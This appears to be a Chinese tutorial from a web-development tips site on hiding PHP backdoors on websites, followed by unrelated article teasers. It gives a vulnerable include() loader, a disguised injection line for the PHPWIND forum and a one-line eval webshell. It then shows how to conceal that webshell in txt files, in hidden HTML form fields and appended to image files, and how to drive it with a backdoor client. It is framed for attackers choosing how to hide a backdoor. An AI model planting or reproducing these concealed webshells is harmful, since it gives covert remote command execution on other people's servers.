PHP网站后门的隐藏技巧测试报告

2016-01-29 13:36 6 1 收藏

PHP网站后门的隐藏技巧测试报告,PHP网站后门的隐藏技巧测试报告

【 tulaoshi.com - PHP 】

     要知道如果光把PHP语句放到图片里是无论如何也不能执行的,因为PHP只解析扩展名为php的文件。所以说要能使隐藏在图片里的PHP语句执行。我们就的借助PHP中的调用函数 :include 、require 等。

   我们还记得前些日子把木马隐藏到图片的文章吧。也就是在PHP文件里用include("x.gif")这样的语句来调用隐藏在图片的木马语句。ASP中语句也类似。看似非常隐蔽但直接调用图片对稍微懂点PHP的人就不难发现可疑之处。由于URL 里用GET方式很难传递参数,这就使得插入木马的性能得不到发挥。

   include 函数在PHP中使用的比较频繁,所以引起的安全问题也实在太多,例如PHPWIND1.36的漏洞就是因为include后面的变量没做过滤引起的。由此我们就可以构造类似的语句来插入到PHP文件中。然后把木马隐藏到图片或HTML文件里,可以说隐蔽性就更高了。如在PHPWIND论坛里插入下面的语句:<‘'?@include includ/.$PHPWIND_ROOT;? <mailto:?@include 'includ/'.$PHPWIND_ROOT;?>> 一般管理员是无法看出来的。

   有了include 函数来辅助帮忙我们就可以把PHP木马隐藏到 诸如 txt、html和图片文件等很多类型的文件里来了。因为txt、html和图片文件这三种类型的文件最无论在论坛还是文章系统里是最为常见的了,下面我们就依次来做测试。

   首先建立一PHP文件test.php 文件内容为:

<?php
$test=$_GET['test'];
@include 'test/'.$test;
?>

   Txt文件一般都是说明文件,所以我们把一句话木马放到目录的说明文件里就OK了。随便建立一个TXT文件t.txt。我们把一句话木马<?eval ($_POST[cmd]);?>粘贴到t.txt文件里。然后访问 http://localhost/test/test.php?test=../t.txt <http://localhost/phpw/index.php?PHPWIND_ROOT=../robots.txt>如果你看到t.txt的内容就证明Ok了, 然后把在lanker微型PHP后门客户端 木马地址添入 http://localhost/test/test.php?test=../t.txt <http://localhost/phpw/index.php?PHPWIND_ROOT=../robots.txt>密码里添入cmd就可以了,执行返回的结果都可以看到。

   对于HTML的文件,一般都为模版文件。为了使插入到HTML的文件的木马能被调用执行而且不被显示出来,我们可以在HTML里加入一个隐藏属性的文本框 ,如:<input type=hidden value="<?eval($_POST[cmd]);?>"> 然后使用方法同上。执行的返回结果一般都可以查看源文件看到。如使用查看本程序目录功能。查看源文件内容为 <input type=hidden value="C:Uniserver2_7swwwtest"> 我可以得到目录为 C:Uniserver2_7swwwtest。

   下面我们说说图片文件,要说最为毒的一招莫过于把木马隐藏到图片里。我们可以直接对一个图片进行编辑,把<?eval($_POST[cmd]);?>插入到图片末尾。

   经测试一般都不会对图片造成影响。然后同样方法客户端木马地址添入 <http://localhost/test/test.php?test=../1.jpg>
我们查看PHP环境变量 返回的是结果是原图片。

   这里可能要和我们想象的结果有些差距了,其实命令已经运行了,只是返回的结果看不到而已,因为这是真正的GIF文件,所以是不会显示返回结果的,为了证明是否真的执行了命令我们 执行上传文件命令。果不出所料,文件已经成功上传到服务器上。这样伪造的优点是隐蔽性好。缺点也自然不用说了是没回显。如果你想看到返回的结果,那就拿出记事本伪造一个假的图片文件吧。

   到这里就基本测试完了,怎样隐蔽PHP后门就看你自己的选择了。行文仓促,如有不妥之处,请指出

(本文来源于图老师网站,更多请访问http://www.tulaoshi.com/php/)

来源:http://www.tulaoshi.com/n/20160129/1490805.html

延伸阅读
标签: PHP
  文/徐永久 我们知道 Zend 有免费的优化引擎针对 PHP 而作,但是 FreeLAMP 这次采用的是一个叫做 PHP Accelerator 的缓冲产品。 我们在 “LAMP 加速” 这篇文章中阐述过加速的几种办法,其中提到了 PHP Accelerator,它的安装方法十分简单,但是需要去他的网站获取一个激活键。    一、下载: www.php...
自Google出现并改变了游戏规则之后,用户对于网页的关注时间一直在下降。对于任何一个时下话题,有千万条结果可以关注,可以抓住访问者注意力的机会非常明显地下降了(2002年,BBC报告指出大约在9秒内)。想象一下你自己浏览网页时的时:你会阅读所有的文字和图片,尝试着彻底了解整个网页内容是什么吗?最有可能的答案是:不会。伴随着充斥四周的...
标签: PHP
文/李鲲程 随着网络的普及,网站已经渗透到了每个行业,但是由于目前专线费用让很多企业和个人难以承受,所以共享带宽成为很多网站的首选方案。费用虽然降低了但是一个新的问题很快就出现了,那就是共享带宽的网速很慢,有时甚至让人无法忍受。如何能让自己的网站快起来,成为人们关心的问题,笔者结合亲身实践来讲讲软办法...
标签: PHP
1、关于PHP重定向 方法一:header("Location: index.php"); 方法二:echo "<scriptwindow.location =\"$PHP_SELF\";</script"; 方法三:echo "<META HTTP-EQUIV=\"Refresh\" CONTENT=\"0; URL=index.php\""; 2、获取访问者浏览器 function browse_infor()...
标签: PHP
  三 首页新闻发布,让你更新更轻松(下) -----上一讲里,我们已经实现了首页新闻发布的基本功能。在这一讲里,我们再给它添砖加瓦,使它的功能更为强大。(一个好用的软件,其实也就是基本功能加上一批附属功能,这些附属功能主要也是图个方便而已,呵呵) -----首先,我们再明确一下我们想获得什么方便。我们不希望几十天以前的东西...

经验教程

932

收藏

66
微博分享 QQ分享 QQ空间 手机页面 收藏网站 回到头部